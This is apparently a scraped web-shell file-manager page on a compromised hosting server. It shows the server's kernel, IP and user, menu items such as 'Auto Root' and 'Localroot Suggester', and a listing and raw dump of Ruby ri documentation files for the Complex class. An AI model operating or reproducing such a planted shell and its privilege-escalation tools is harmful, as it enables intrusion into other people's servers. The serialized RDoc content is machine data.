Linux server1.dn-server.com 4.18.0-553.89.1.lve.el8.x86_64 #1 SMP Wed Dec 10 13:58:50 UTC 2025 x86_64
LiteSpeed
Server IP : 195.201.204.189 & Your IP : 216.73.216.198
Domains :
Cant Read [ /etc/named.conf ]
User : beriska1
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
/
opt /
alt /
ruby32 /
share /
ri /
system /
Complex /
Delete
Unzip
Name
Size
Permission
Date
Action
%2a%2a-i.ri
514
B
-rw-r--r--
2026-04-07 17:42
%2a-i.ri
647
B
-rw-r--r--
2026-04-07 17:42
%2b-i.ri
636
B
-rw-r--r--
2026-04-07 17:42
%2d%40-i.ri
410
B
-rw-r--r--
2026-04-07 17:42
%2d-i.ri
635
B
-rw-r--r--
2026-04-07 17:42
%2f-i.ri
736
B
-rw-r--r--
2026-04-07 17:42
%3c%3d%3e-i.ri
818
B
-rw-r--r--
2026-04-07 17:42
%3d%3d-i.ri
660
B
-rw-r--r--
2026-04-07 17:42
abs-i.ri
517
B
-rw-r--r--
2026-04-07 17:42
abs2-i.ri
466
B
-rw-r--r--
2026-04-07 17:42
angle-i.ri
446
B
-rw-r--r--
2026-04-07 17:42
arg-i.ri
529
B
-rw-r--r--
2026-04-07 17:42
as_json-i.ri
377
B
-rw-r--r--
2026-04-07 17:42
cdesc-Complex.ri
3.17
KB
-rw-r--r--
2026-04-07 17:42
conj-i.ri
418
B
-rw-r--r--
2026-04-07 17:42
conjugate-i.ri
483
B
-rw-r--r--
2026-04-07 17:42
denominator-i.ri
430
B
-rw-r--r--
2026-04-07 17:42
fdiv-i.ri
505
B
-rw-r--r--
2026-04-07 17:42
finite%3f-i.ri
411
B
-rw-r--r--
2026-04-07 17:42
hash-i.ri
221
B
-rw-r--r--
2026-04-07 17:42
imag-i.ri
451
B
-rw-r--r--
2026-04-07 17:42
imaginary-i.ri
510
B
-rw-r--r--
2026-04-07 17:42
infinite%3f-i.ri
601
B
-rw-r--r--
2026-04-07 17:42
inspect-i.ri
734
B
-rw-r--r--
2026-04-07 17:42
json_create-c.ri
420
B
-rw-r--r--
2026-04-07 17:42
magnitude-i.ri
469
B
-rw-r--r--
2026-04-07 17:42
numerator-i.ri
840
B
-rw-r--r--
2026-04-07 17:42
phase-i.ri
446
B
-rw-r--r--
2026-04-07 17:42
polar-c.ri
711
B
-rw-r--r--
2026-04-07 17:42
polar-i.ri
462
B
-rw-r--r--
2026-04-07 17:42
quo-i.ri
740
B
-rw-r--r--
2026-04-07 17:42
rationalize-i.ri
657
B
-rw-r--r--
2026-04-07 17:42
real%3f-i.ri
393
B
-rw-r--r--
2026-04-07 17:42
real-i.ri
440
B
-rw-r--r--
2026-04-07 17:42
rect-c.ri
548
B
-rw-r--r--
2026-04-07 17:42
rect-i.ri
458
B
-rw-r--r--
2026-04-07 17:42
rectangular-c.ri
562
B
-rw-r--r--
2026-04-07 17:42
rectangular-i.ri
664
B
-rw-r--r--
2026-04-07 17:42
to_c-i.ri
446
B
-rw-r--r--
2026-04-07 17:42
to_d-i.ri
873
B
-rw-r--r--
2026-04-07 17:42
to_f-i.ri
564
B
-rw-r--r--
2026-04-07 17:42
to_i-i.ri
567
B
-rw-r--r--
2026-04-07 17:42
to_json-i.ri
399
B
-rw-r--r--
2026-04-07 17:42
to_r-i.ri
604
B
-rw-r--r--
2026-04-07 17:42
to_s-i.ri
680
B
-rw-r--r--
2026-04-07 17:42
Save
Rename
U:RDoc::NormalClass[iI"Complex:ET@I"Numeric;To:RDoc::Markup::Document:@parts[o;;[o:RDoc::Markup::Paragraph;[ I"FA complex number can be represented as a paired real number with ;TI"Fimaginary unit; a+bi. Where a is real part, b is imaginary part ;TI":and i is imaginary unit. Real a equals complex a+0i ;TI"mathematically.;To:RDoc::Markup::BlankLine o; ;[I"6You can create a \Complex object explicitly with:;T@o:RDoc::Markup::List: @type:BULLET:@items[o:RDoc::Markup::ListItem:@label0;[o; ;[I"IA {complex literal}[rdoc-ref:syntax/literals.rdoc@Complex+Literals].;T@o; ;[I">You can convert certain objects to \Complex objects with:;T@o;;; ;[o;;0;[o; ;[I"\Method #Complex.;T@o; ;[I"AComplex object can be created as literal, and also by using ;TI"BKernel#Complex, Complex::rect, Complex::polar or to_c method.;T@o:RDoc::Markup::Verbatim;[ I"%2+1i #=> (2+1i) ;TI"%Complex(1) #=> (1+0i) ;TI"%Complex(2, 3) #=> (2+3i) ;TI"HComplex.polar(2, 3) #=> (-1.9799849932008908+0.2822400161197344i) ;TI"%3.to_c #=> (3+0i) ;T:@format0o; ;[I"GYou can also create complex object from floating-point numbers or ;TI" strings.;T@o;;[I"'Complex(0.3) #=> (0.3+0i) ;TI")Complex('0.3-0.5i') #=> (0.3-0.5i) ;TI".Complex('2/3+3/4i') #=> ((2/3)+(3/4)*i) ;TI"HComplex('1@2') #=> (-0.4161468365471424+0.9092974268256817i) ;TI" ;TI"'0.3.to_c #=> (0.3+0i) ;TI")'0.3-0.5i'.to_c #=> (0.3-0.5i) ;TI".'2/3+3/4i'.to_c #=> ((2/3)+(3/4)*i) ;TI"H'1@2'.to_c #=> (-0.4161468365471424+0.9092974268256817i) ;T;0o; ;[I">A complex object is either an exact or an inexact number.;T@o;;[I".Complex(1, 1) / 2 #=> ((1/2)+(1/2)*i) ;TI"(Complex(1, 1) / 2.0 #=> (0.5+0.5i);T;0: @fileI"complex.c;T:0@omit_headings_from_table_of_contents_below0o;;[ ;I"*ext/bigdecimal/lib/bigdecimal/util.rb;T;0o;;[ ;I"%ext/json/lib/json/add/complex.rb;T;0;0;0[ [U:RDoc::Constant[i I"I;TI"Complex::I;T:public0o;;[o; ;[I"The imaginary unit.;T;@I;0@I@cRDoc::NormalClass0[ [[I" class;T[[;[ [:protected[ [:private[ [I"json_create;TI"%ext/json/lib/json/add/complex.rb;T[I" polar;TI"complex.c;T[I" rect;T@l[I"rectangular;T@l[I" instance;T[[;[ [;[ [;[-[I"*;T@l[I"**;T@l[I"+;T@l[I"-;T@l[I"-@;T@l[I"/;T@l[I"<=>;T@l[I"==;T@l[I"abs;T@l[I" abs2;T@l[I" angle;T@l[I"arg;T@l[I"as_json;T@i[I" conj;T@l[I"conjugate;T@l[I"denominator;T@l[I" fdiv;T@l[I"finite?;T@l[I" hash;T@l[I" imag;T@l[I"imaginary;T@l[I"infinite?;T@l[I"inspect;T@l[I"magnitude;T@l[I"numerator;T@l[I" phase;T@l[I" polar;T@l[I"quo;T@l[I"rationalize;T@l[I" real;T@l[I" real?;T@l[@n@l[I"rectangular;T@l[I" to_c;T@l[I" to_d;TI"*ext/bigdecimal/lib/bigdecimal/util.rb;T[I" to_f;T@l[I" to_i;T@l[I"to_json;T@i[I" to_r;T@l[I" to_s;T@l[ [U:RDoc::Context::Section[i 0o;;[ ;0;0[I"complex.c;TI"*ext/bigdecimal/lib/bigdecimal/util.rb;TI"%ext/json/lib/json/add/complex.rb;T@OcRDoc::TopLevel